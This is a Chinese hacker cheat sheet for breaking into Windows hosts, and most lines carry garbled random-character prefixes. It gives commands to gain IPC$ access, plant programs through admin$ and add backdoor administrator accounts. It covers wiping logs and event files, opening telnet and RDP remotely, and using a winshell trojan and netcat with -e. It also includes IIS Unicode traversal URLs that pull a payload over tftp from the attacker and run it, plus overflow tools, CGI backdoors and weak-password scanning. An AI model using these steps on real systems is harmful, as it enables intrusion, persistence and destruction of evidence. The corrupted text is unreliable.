网管和黑客都必须知道的命令
UFk!dK+ 常用的几条NET命令:
k) 3s? KE#$+,? (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
500>
CBL0O %OFj (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
,N;v~D$Y wJ(8}eI (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
Xiw@ lG
<yJ~{ (查看远程主机时间) net time \\IP地址
QP<FCmt8 )?9\$^I (定时启动某个程序) at \\IP地址 02:18 readme.exe
s%bUgO%& |87W* (查看共享) net view \\IP地址
[nC4/V+- [{/$9k-aF? (查看netbios工作组列表) nbtstat -A IP地址
Ba<#1p7_ g X8**g' (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
>Ban?3{ K~$ 35c3M (这两条把自己增加到管理员组): net user 用户名 密码 /add
{[N?+ZJD*L uh1S
7!^ net localgroup Administrators 用户名 /add
/xF 9:r wU.'_SBfB (断开连接) net use \\IP地址\ipc$ /delete
BZ}`4W' .h a`)@MsZ 扫尾:
%L28$c3p uGM>C" del C:\winnt\system32\logfiles\*.*
"W3W:vl! 2>ys2:z del C:\winnt\ssytem32\config\*.evt
-S7RRh'p d~3GV(M del C:\winnt\system32\dtclog\*.*
we
}#Ru* >b3@>W del C:\winnt\system32\*.log
+fPNen4E gfxoJihE del C:\winnt\system32\*.txt
@{'o#EJY J/L)3y del C:\winnt\*.txt
A}gYcc85Z &bn*p.=G del C:\winnt\*.log
OX`?<@6 xP42xv9U 一、netsvc.exe
Ls lM$
icU"Vyu 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
_dJp
3D cxL,]27Bu netsvc /list \\IP地址
2V
4`s' <` #,AVH netsvc schedule \\IP地址 /query
D\ n>*x {`tHJ|8 netsvc \\IP地址 schedule /start
bGhhh/n $ #TID= 二、OpenTelnet.exe
-6(h@F%E r$94J'_ 远程启动主机的Telnet服务,并绑定端口到7878,例如:
*X%?3"WH8 )hePN4edj OpenTelnet \\IP地址 用户名 密码 1 7878
)J{.Cx<E ZCj>MA 然后就可以telnet到主机的7878端口,进入DOS方式下:
'\Qf,%%. b (g_.1[ telnet IP地址 7878
E=$7ieW ]kyle3#-~ 三、winshell.exe
<{3q{VW*
Iz 1*4@ 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
!a.3OpQ /+Wb6{lY p Path (查看winshell主程序的路径信息)
mvUVy1-c ;4+qPWwq8W b reBoot (重新启动机器)
x&mz- MBnK&GS d shutDown (关闭机器)
at_dmU2[7 A}az
m> s Shell (执行后你就会看到可爱的“C:\>”)
B iVd
ka -U/I'RDLEz x eXit (退出本次登录会话,此命令并不终止winshell的运行)
CD XB&%Sr gt].rwo" CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
@h ,h=X D4YT33$tC 四、3389登陆器,GUI方式登录远程主机的
nPQZI6> jM|YW*zNZ 五、elsave.exe
>[A65q' ymzPJ??! 事件日志清除工具
'fp<FeTg *y":@T elsave -s \\IP地址 -l "application" -C
CDwFVR'_Af 3G:NZ) p elsave -s \\IP地址 -l "system" -C
')Dp%"\? 8`R +y elsave -s \\IP地址 -l "security" -C
6!gtve_
E@\d<c. 执行后成功清除应用程序日志,系统日志,安全日志
WrIL]kJw^
/)eNx 六、hbulot.exe
_Ex*%Qf. {="Su{i}} 开启win2kserver和winxp的3389服务
4{Yy05PFS YU ]G5\UU hbulot [/r]
cq@_*:~Or K%aPl~e 使用/r表示安装完成后自动重起目标使设置生效。
2Be ?5+ YokZar2a0 七、nc.exe(netcat.exe)
=: v>< =2vMw] 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
)Yy#`t 3& fIO 想要连接到某处: nc [-options] hostname port[s] [ports] ...
lN][xnP _taHf %\4 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
5* o\z&*L q|Pt>4c5? 参数:
mV!
@oNCK GWA!Ab'<U -e prog 程序重定向,一旦连接,就执行 [危险!!]
-KU)7V yjM@/b -g gateway source-routing hop point[s], up to 8
a2klOX{ Vm,f3~ -G num source-routing pointer: 4, 8, 12, ...
zvK5Zxl W2W2WyPk -h 帮助信息
KWn1 %oGJ Jv4D^>yj[ -i secs 延时的间隔
l:5CM[mZ tci%=3,) -l 监听模式,用于入站连接
lu@>?,< _c(C;s3o -n 指定数字的IP地址,不能用hostname
&Lt$a_y> \w0b"p -o file 记录16进制的传输
$bi_i|? L/iVs`qF -p port 本地端口号
8HRPJSO~g cf[u%{
6Y -r 任意指定本地及远程端口
Sfoy8<j gt t$O -s addr 本地源地址
eE riv@v s
eZ<52f2 -u UDP模式
$qUta<o2@
\#+2;L -v 详细输出——用两个-v可得到更详细的内容
Dy{`">a &fd4IO/O -w secs timeout的时间
w[$nO# /4B4IT -z 将输入输出关掉——用于扫描时
FG5c:Ep 八、TFTPD32.EXE
D"] [&m sc $QbO c 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
ZV q gM5p1?E http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
-ynLuq#1A C}P
\kDM 然后可以直接令文件运行:
=@jMx^A" r?yJ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
lKhh=Pc2 gUszMhHX 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
`)C`_g3Ew FvNSu"O~K1 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
o(>-:l i0 ]zq_gV8k 一、一 Xscan命令行运行参数说明:
L|1zHDxQ b`W'M:$ 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
vB YT)S |^k1hX2?W 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
v{{2<,l X@AkA9'fq xscan -file <主机列表文件名> <检测项目> [其他选项]
AB&wn>q ^RyTK|SQ 其中<检测项目> 含义如下:
rD
U6 5j HJ1\FO9\ -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
YG1`%,OW` #Xw[i -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
8!%"/*P$ l
75{JxZX -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
5F sj_wFk ODvpMt:+ -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
^}7t: D:vUy* -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
F4<2.V)#- |wb(rua [其他选项] 含义如下:
MirBJL f uNXY-; -v: 显示详细扫描进度
c2mt<DtWW H'\ EA(v+ -p: 跳过Ping不通的主机
3R:i*8C :;WDPRx -o: 跳过没有检测到开放端口的主机
k\<Ln
w EM
w(%}8w -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10